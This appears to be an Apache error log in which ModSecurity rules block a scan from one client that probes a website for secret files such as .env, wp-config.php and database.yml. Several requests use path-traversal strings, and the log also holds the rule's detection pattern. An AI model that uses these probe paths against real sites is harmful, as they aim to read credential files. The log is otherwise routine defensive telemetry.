[Tue May 12 04:39:40.987694 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS7Ho6NvB9WXx5V-6e9QAAAQw"]
[Tue May 12 04:39:40.996345 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/var/www/html/.env"] [unique_id "agKS7Due9Sp-pIv_Bb61eAAAAUQ"], referer: https://tchatbooster.com/var/www/html/.env
[Tue May 12 04:39:40.996575 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/var/www/html/.env"] [unique_id "agKS7Due9Sp-pIv_Bb61eAAAAUQ"], referer: https://tchatbooster.com/var/www/html/.env
[Tue May 12 04:39:41.036479 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 9 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS7M1tk6y7yBJLpJop6wAAAII"], referer: https://tchatbooster.com/.%00/../../.env
[Tue May 12 04:39:41.443755 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS7Ho6NvB9WXx5V-6e9QAAAQw"]
[Tue May 12 04:39:41.473116 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS7c1tk6y7yBJLpJop7AAAAII"], referer: https://tchatbooster.com/css../../wp-config.php
[Tue May 12 04:39:41.473338 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS7c1tk6y7yBJLpJop7AAAAII"], referer: https://tchatbooster.com/css../../wp-config.php
[Tue May 12 04:39:41.485999 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS7Due9Sp-pIv_Bb61eAAAAUQ"], referer: https://tchatbooster.com/var/www/html/.env
[Tue May 12 04:39:41.522313 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/public/.env"] [unique_id "agKS7Xo6NvB9WXx5V-6e9gAAAQw"]
[Tue May 12 04:39:41.522518 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/public/.env"] [unique_id "agKS7Xo6NvB9WXx5V-6e9gAAAQw"]
[Tue May 12 04:39:41.967362 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS7c1tk6y7yBJLpJop7AAAAII"], referer: https://tchatbooster.com/css../../wp-config.php
[Tue May 12 04:39:41.974552 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS7Xo6NvB9WXx5V-6e9gAAAQw"]
[Tue May 12 04:39:41.989977 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKS7Tue9Sp-pIv_Bb61egAAAU8"]
[Tue May 12 04:39:41.990190 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKS7Tue9Sp-pIv_Bb61egAAAU8"]
[Tue May 12 04:39:41.993215 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/public/.env"] [unique_id "agKS7c1tk6y7yBJLpJop7QAAAII"], referer: https://tchatbooster.com/public/.env
[Tue May 12 04:39:41.993395 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/public/.env"] [unique_id "agKS7c1tk6y7yBJLpJop7QAAAII"], referer: https://tchatbooster.com/public/.env
[Tue May 12 04:39:42.457516 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS7Tue9Sp-pIv_Bb61egAAAU8"]
[Tue May 12 04:39:42.500246 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS7c1tk6y7yBJLpJop7QAAAII"], referer: https://tchatbooster.com/public/.env
[Tue May 12 04:39:42.523258 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/storage/.env"] [unique_id "agKS7jue9Sp-pIv_Bb61gAAAAU8"]
[Tue May 12 04:39:42.523476 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/storage/.env"] [unique_id "agKS7jue9Sp-pIv_Bb61gAAAAU8"]
[Tue May 12 04:39:42.636057 2026] [authz_core:error] [pid 1825179:tid 1825203] [client 176.120.22.46:60679] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/block-bindings/error_log, referer: https://www.maelbailly.fr/wp-includes/block-bindings/
[Tue May 12 04:39:42.989424 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKS7no6NvB9WXx5V-6e_QAAAQw"]
[Tue May 12 04:39:42.989584 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKS7no6NvB9WXx5V-6e_QAAAQw"]
[Tue May 12 04:39:43.000128 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS7jue9Sp-pIv_Bb61gAAAAU8"]
[Tue May 12 04:39:43.018689 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/storage/.env"] [unique_id "agKS7zue9Sp-pIv_Bb61hQAAAUQ"], referer: https://tchatbooster.com/storage/.env
[Tue May 12 04:39:43.018940 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/storage/.env"] [unique_id "agKS7zue9Sp-pIv_Bb61hQAAAUQ"], referer: https://tchatbooster.com/storage/.env
[Tue May 12 04:39:43.274976 2026] [ssl:error] [pid 1730175:tid 1730179] (EAI 2)Name or service not known: [client 116.202.235.23:58994] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:39:43.275013 2026] [ssl:error] [pid 1730175:tid 1730179] AH01941: stapling_renew_response: responder error
[Tue May 12 04:39:43.399254 2026] [ssl:error] [pid 1808852:tid 1808866] (EAI 2)Name or service not known: [client 116.202.235.23:59000] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:39:43.399284 2026] [ssl:error] [pid 1808852:tid 1808866] AH01941: stapling_renew_response: responder error
[Tue May 12 04:39:43.475983 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS7no6NvB9WXx5V-6e_QAAAQw"]
[Tue May 12 04:39:43.488800 2026] [ssl:error] [pid 1820198:tid 1820218] (EAI 2)Name or service not known: [client 116.202.235.23:59008] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:39:43.488835 2026] [ssl:error] [pid 1820198:tid 1820218] AH01941: stapling_renew_response: responder error
[Tue May 12 04:39:43.538734 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS7zue9Sp-pIv_Bb61hQAAAUQ"], referer: https://tchatbooster.com/storage/.env
[Tue May 12 04:39:43.566113 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/www/.env"] [unique_id "agKS73o6NvB9WXx5V-6fAQAAAQw"]
[Tue May 12 04:39:43.566321 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/www/.env"] [unique_id "agKS73o6NvB9WXx5V-6fAQAAAQw"]
[Tue May 12 04:39:43.665441 2026] [ssl:error] [pid 1825287:tid 1825313] (EAI 2)Name or service not known: [client 116.202.235.23:59022] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:39:43.665516 2026] [ssl:error] [pid 1825287:tid 1825313] AH01941: stapling_renew_response: responder error
[Tue May 12 04:39:44.005147 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKS8Due9Sp-pIv_Bb61igAAAU8"]
[Tue May 12 04:39:44.005367 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKS8Due9Sp-pIv_Bb61igAAAU8"]
[Tue May 12 04:39:44.026835 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS73o6NvB9WXx5V-6fAQAAAQw"]
[Tue May 12 04:39:44.045298 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/www/.env"] [unique_id "agKS8M1tk6y7yBJLpJop-QAAAII"], referer: https://tchatbooster.com/www/.env
[Tue May 12 04:39:44.045531 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/www/.env"] [unique_id "agKS8M1tk6y7yBJLpJop-QAAAII"], referer: https://tchatbooster.com/www/.env
[Tue May 12 04:39:44.461073 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS8Due9Sp-pIv_Bb61igAAAU8"]
[Tue May 12 04:39:44.535464 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS8M1tk6y7yBJLpJop-QAAAII"], referer: https://tchatbooster.com/www/.env
